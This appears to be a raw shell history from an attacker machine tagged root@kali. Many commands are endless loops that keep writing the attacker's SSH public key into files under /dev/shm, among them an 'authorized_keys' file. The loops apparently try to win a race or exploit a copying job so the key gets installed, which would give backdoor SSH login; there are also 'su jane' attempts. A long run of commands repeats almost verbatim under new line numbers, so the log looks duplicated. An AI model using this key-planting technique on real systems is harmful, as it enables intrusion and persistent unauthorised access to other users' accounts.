 1259  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm* > /dev/null; done
 1260  clear
 1261  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1262  clear
 1263  ls -la 
 1264  rm -r id_rsa.pub 
 1265  clear
 1266  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1267  ls -al 
 1268  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1269  cd /dev/shm/
 1270  ls -al 
 1271  cd keys/
 1272  ls 
 1273  touch file.txt
 1274  cd ..
 1275  cd /tmp/
 1276  cd t
 1277  cd test/
 1278  touch file.txt
 1279  cd ..
 1280  touch file.txt
 1281  rm -r 
 1282  rm -r file.txt 
 1283  cd t
 1284  cd test/
 1285  ls -al 
 1286  touch file.txt
 1287  cd /dev/shm/
 1288  ls -la 
 1289  cd keys/
 1290  ls 
 1291  cd..
 1292  clear
 1293  ls -al 
 1294  cd ..
 1295  ls -la 
 1296  rm -r keys/
 1297  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1298  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1299  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub > /dev/null; done
 1300  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1301  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1302  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1303  ls -la 
 1304  cd keys/
 1305  ls -la 
 1306  cat id_rsa.pub\* 
 1307  clear
 1308  ls a- l
 1309  clear
 1310  ls -la 
 1311  cat id_rsa.pub\* 
 1312  cd..
 1313  cd ..
 1314  clear
 1315  ls -la 
 1316  cd l
 1317  cd keys/
 1318  ls -la 
 1319  rm -r id_rsa.pub\* 
 1320  clear
 1321  ls -la 
 1322  cd ..
 1323  ls -a l
 1324  rm -r keys/
 1325  clear
 1326  ls -al 
 1327  ls -la 
 1328  cd ..
 1329  cd shm/
 1330  ls -la 
 1331  su jane
 1332  clear
 1333  ls -]al 
 1334  clear
 1335  ls -la 
 1336  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm* > /dev/null; done
 1337  clear
 1338  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1339  clear
 1340  ls -la 
 1341  rm -r id_rsa.pub 
 1342  clear
 1343  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1344  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/authorized_keys > /dev/null; done
 1345  clear
 1346  ls -la 
 1347  cat id_rsa
 1348  rm -r id_rsa
 1349  ls -la 
 1350  clear
 1351  ls -al 
 1352  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/authorized_keys > /dev/null; done
 1353  ls -al 
 1354  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1355  cd /dev/shm/
 1356  ls -al 
 1357  cd keys/
 1358  ls 
 1359  touch file.txt
 1360  cd ..
 1361  cd /tmp/
 1362  cd t
 1363  cd test/
 1364  touch file.txt
 1365  cd ..
 1366  touch file.txt
 1367  rm -r 
 1368  rm -r file.txt 
 1369  cd t
 1370  cd test/
 1371  ls -al 
 1372  touch file.txt
 1373  cd /dev/shm/
 1374  ls -la 
 1375  cd keys/
 1376  ls 
 1377  cd..
 1378  clear
 1379  ls -al 
 1380  cd ..
 1381  ls -la 
 1382  rm -r keys/
 1383  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1384  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1385  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub > /dev/null; done
 1386  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1387  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1388  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1389  ls -la 
 1390  cd keys/
 1391  ls -la 
 1392  cat id_rsa.pub\* 
 1393  clear
 1394  ls a- l
 1395  clear
 1396  ls -la 
 1397  cat id_rsa.pub\* 
 1398  cd..
 1399  cd ..
 1400  clear
 1401  ls -la 
 1402  cd l
 1403  cd keys/
 1404  ls -la 
 1405  rm -r id_rsa.pub\* 
 1406  clear
 1407  ls -la 
 1408  cd ..
 1409  ls -a l
 1410  rm -r keys/
 1411  clear
 1412  ls -al 
 1413  ls -la 
 1414  cd ..
 1415  cd shm/
 1416  ls -la 
 1417  su jane
 1418  clear
 1419  ls -]al 
 1420  clear
 1421  ls -la 
 1422  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm* > /dev/null; done
 1423  clear
 1424  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1425  clear
 1426  ls -la 
 1427  rm -r id_rsa.pub 
 1428  clear
